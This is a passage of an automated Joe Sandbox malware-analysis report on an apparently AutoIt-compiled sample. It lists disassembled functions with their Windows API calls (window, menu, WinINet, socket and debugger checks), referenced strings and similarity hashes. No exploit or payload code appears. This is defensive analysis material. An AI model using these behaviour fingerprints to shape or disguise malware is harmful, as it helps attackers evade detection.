                                        • Instruction Fuzzy Hash: C741D672A00649BADF20AAA5DC45FEFBBFDDF49714F00007AB904F7181DA75AA0487A1
                                        APIs
                                        • _memset.LIBCMT ref: 00EF2892
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EF28C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: |
                                        • API String ID: 1413715105-2343686810
                                        • Opcode ID: 885ea0198366cd8ee9eb78a95842e60b5c250afc90aeb16e8674444b0bec1f32
                                        • Instruction ID: 83c06f81c5345cc9385d7bb75d29a101da5c6b5128b35e8e07c6310eb10c9c4a
                                        • Opcode Fuzzy Hash: 885ea0198366cd8ee9eb78a95842e60b5c250afc90aeb16e8674444b0bec1f32
                                        • Instruction Fuzzy Hash: 8B311971800119AFCF15AFA1CC85EEEBFB9FF08300F105069F959B6166DB319A56DBA0
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F06D86
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F06DC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 0cc9a72414f88465047bfdad8a8068298badf5bef14408f69809805c3b270a2b
                                        • Instruction ID: e1c6b3f2accb04a5a0d85a1727f83b4983507e4b9a791499e5b1f3638246d631
                                        • Opcode Fuzzy Hash: 0cc9a72414f88465047bfdad8a8068298badf5bef14408f69809805c3b270a2b
                                        • Instruction Fuzzy Hash: 9A318F71610604AEEB109F64CC80BFB77B9FF48724F109619F9AAD7190DB35AC91EB60
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2E00
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EE2E3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: f38df8bb2f7a98ff9bc4a7a88fe41d29ef078233e361307092457ac1c1bb2fcd
                                        • Instruction ID: b662122b55ab7eb96d7080e6607f686acee392371d29d4f2878298eb6f27b56d
                                        • Opcode Fuzzy Hash: f38df8bb2f7a98ff9bc4a7a88fe41d29ef078233e361307092457ac1c1bb2fcd
                                        • Instruction Fuzzy Hash: EA31273160035DABEB268F5AD8847AEBBFDFF05354F14106DEA81B61B0D7709940CB10
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F069D0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F069DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                                        • Instruction ID: 0f8857c50993ec1c5245e78c74e565151544931df2cad9fbb3ddca2b7695e11e
                                        • Opcode Fuzzy Hash: 74f82c9e0b460ee36268822b5eb3146255a4db180e7942e3bec188c6e1f1cf00
                                        • Instruction Fuzzy Hash: A611B271B00208AFEF219F14CC90EAB37AAEB993A4F114124F958D72E0D6759C61B7A0
                                        APIs
                                          • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                                          • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                                          • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                                        • GetWindowRect.USER32(00000000,?), ref: 00F06EE0
                                        • GetSysColor.USER32(00000012), ref: 00F06EFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                                        • Instruction ID: 54d47c454b28b71431f7c9f5e53a068684329fc2b00dfe6f2daaff23397fc71a
                                        • Opcode Fuzzy Hash: 1d54f287f626d3e6895483251d7eeac53e0a364263f222633bdec90fd314bf15
                                        • Instruction Fuzzy Hash: AA215972A1020AAFDB04DFA8CC45AFA7BB8FB08315F004628FD55D3290E734E861AB50
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 00F06C11
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F06C20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                                        • Instruction ID: fd3ebeae73eea4e4f925258a866e0b17b991d23423dfb5db5e0b8bc6ef000d34
                                        • Opcode Fuzzy Hash: 65c569085c3fa094f9539c559347e772d8dc05b3cae283b38660a7867bc51240
                                        • Instruction Fuzzy Hash: A111BCB1900208ABEB209E64DC41EFB37AAEB45378F604724F965D71E0C775DCA1BB60
                                        APIs
                                        • _memset.LIBCMT ref: 00EE2F11
                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EE2F30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                                        • Instruction ID: c4b10ad28f7740363b8de4cac208e423227b817a890b9f0c20f1f7657af91fbc
                                        • Opcode Fuzzy Hash: 94294c85f6b70a5f5d1752a61eeca6c6f4e3b7b763ed0bdbd750d14b276b96b7
                                        • Instruction Fuzzy Hash: 1311B131E0126CABDB35DE99DC44B9D77BDAB16318F0810A9EE44B72A0D770AD04D791
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EF2520
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EF2549
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                                        • Instruction ID: c4c52cfd5499096baf7df2a4ecbda51faafa41ca52128c7d4a6750377c8241c7
                                        • Opcode Fuzzy Hash: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                                        • Instruction Fuzzy Hash: 021106B0501229BADB248F518C95EFBFF68FF05355F10912EF70566040D3709945E6F2
                                        APIs
                                          • Part of subcall function 00EF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EF80C8,?,00000000,?,?), ref: 00EF8322
                                        • inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • htons.WS2_32(00000000), ref: 00EF8108
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 2496851823-2422070025
                                        • Opcode ID: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                                        • Instruction ID: aa57a58eee1b19afafb4151dd965955abe902a825c38745c48d9e1085d8df0f6
                                        • Opcode Fuzzy Hash: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                                        • Instruction Fuzzy Hash: FC11E535200209ABDB20AF64CD46FFEB364FF04324F109627EA15B7291DF71A805C751
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ED9355
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                                        • Instruction ID: 566a32f60a4d24de23741cf861458d5ce7a7c374a802618a895e615e2e1e4479
                                        • Opcode Fuzzy Hash: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                                        • Instruction Fuzzy Hash: D301D271A05214ABCB04FB60CC918FE73A9FF06320B14261AB976773D2DB3198089750
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ED924D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                                        • Instruction ID: 2e27bc6561aae45ac9e85002e92e2336908833457bb8557dbd51ef927b8b4793
                                        • Opcode Fuzzy Hash: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                                        • Instruction Fuzzy Hash: 3F01B171A41108ABCB18FBA0C9929EE73E8EF05700F24201AB91A73292EA519E099261
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ED92D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 372448540-1403004172
                                        • Opcode ID: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                                        • Instruction ID: b70bdd22ad1fa4a1a04ee45adae530d39773867cd655d36aa76e8abca063edf8
                                        • Opcode Fuzzy Hash: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                                        • Instruction Fuzzy Hash: 4E01A771A45108B7CB14FAA0CD82DFF77ECDF11710F242116791A73292DB619E0D9271
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                                        • Instruction ID: b6e962322e76f6d18968816a71accde0b86be06bb28d58dffdcb13bb562f2778
                                        • Opcode Fuzzy Hash: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                                        • Instruction Fuzzy Hash: 16E0D17390432D17D7209A969C45F97F7ECEB55771F000157FD14D7050D660E94587D1
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ED81CA
                                          • Part of subcall function 00EA3598: _doexit.LIBCMT ref: 00EA35A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: c32b992449d1dfa1c222efc76be23cb395232a710c9e4949cd767af203a2f724
                                        • Instruction ID: 411e81d5640060fc34662775db4e313528688eeced99defcd63e0359d49d8ca2
                                        • Opcode Fuzzy Hash: c32b992449d1dfa1c222efc76be23cb395232a710c9e4949cd767af203a2f724
                                        • Instruction Fuzzy Hash: 63D05B323C531D36D21532B86D07FC676C88B09B55F005056BB0C795D38DD2D9D252DA
                                        APIs
                                          • Part of subcall function 00EBB564: _memset.LIBCMT ref: 00EBB571
                                          • Part of subcall function 00EA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00F45158,00000000,00F45144,00EBB540,?,?,?,00E8100A), ref: 00EA0B89
                                        • IsDebuggerPresent.KERNEL32(?,?,?,00E8100A), ref: 00EBB544
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E8100A), ref: 00EBB553
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EBB54E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 3158253471-631824599
                                        • Opcode ID: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                                        • Instruction ID: d33715bc77601c7321cb5f0b3b16dc9631a8965eaf59ae5fa21f921af6a9d119
                                        • Opcode Fuzzy Hash: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                                        • Instruction Fuzzy Hash: 6AE06D702007148FD770DF68E5043837BE4AF04714F00892CE48AD6651D7F4E508DB62
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F05BF5
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F05C08
                                          • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                                        • Instruction ID: e984906d0f86ac1392c1b94d40bf75fb5ef4cb100b1b42e4293a0de04972089e
                                        • Opcode Fuzzy Hash: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                                        • Instruction Fuzzy Hash: 50D01232388315B7E778BB71AC0FFE77A54BB10B55F140839B756AA1D0D9E49804D650